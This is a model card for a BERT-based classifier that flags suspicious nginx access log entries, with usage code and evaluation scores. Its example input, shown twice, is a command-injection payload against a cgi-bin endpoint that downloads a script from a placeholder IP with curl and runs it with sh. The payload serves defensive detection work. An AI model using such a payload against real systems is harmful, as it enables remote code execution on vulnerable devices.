Edit model card

Log Inspector

Pretrained model on nginx access logs. Based on bert-base-cased.

How to use

Here is how to use this model to inspect a log.

Given text must be parsed as like:
"path: <path>; ref:<referrer>; ua:<user agent>;"

>>> from transformers import pipeline
>>> inspector = pipeline('text-classification', model="u-haru/log-inspector")
>>> inspector('path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;')
[{'label': 'LABEL_0', 'score': 0.9999788999557495}]

class 0 is a suspicious log. class 1 is a safe log.

With simpletransformer:

>>> from simpletransformers.classification import ClassificationModel
>>> model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
>>> predictions, raw_outputs = model.predict(['path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;'])
>>> print(predictions)
[0]

Evaluate or training:

>>> from simpletransformers.classification import ClassificationModel
>>> model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
>>> data = [["Suspicious log",0],["Safe log",1]]
>>> df = pd.DataFrame(data)

>>> model.train_model(df)
>>> result, model_outputs, wrong_predictions = model.eval_model(df)
>>> print(result)
{'mcc': 1.0, 'tp': 1, 'tn': 1, 'fp': 0, 'fn': 0, 'auroc': 1.0, 'auprc': 1.0, 'eval_loss': 1.8238850316265598e-05}

I trained with 9500 access logs. Here is evaluation score:

{'mcc': 0.993114718313972, 'tp': 1639, 'tn': 729, 'fp': 0, 'fn': 7, 'auroc': 0.9994166345815686, 'auprc': 0.9997937194890235, 'eval_loss': 0.020282083051662583}

and evaluation with 10000 logs:

{'mcc': 0.8494104528008076, 'tp': 9964, 'tn': 26, 'fp': 0, 'fn': 10, 'auroc': 0.9999845752803442, 'auprc': 0.9999999597891697, 'eval_loss': 0.0058870489358901976}

Training

Source codes are available here: github.com/u-haru/log-inspector

Downloads last month
12
Inference Examples
This model does not have enough activity to be deployed to Inference API (serverless) yet. Increase its social visibility and check back later, or deploy to Inference Endpoints (dedicated) instead.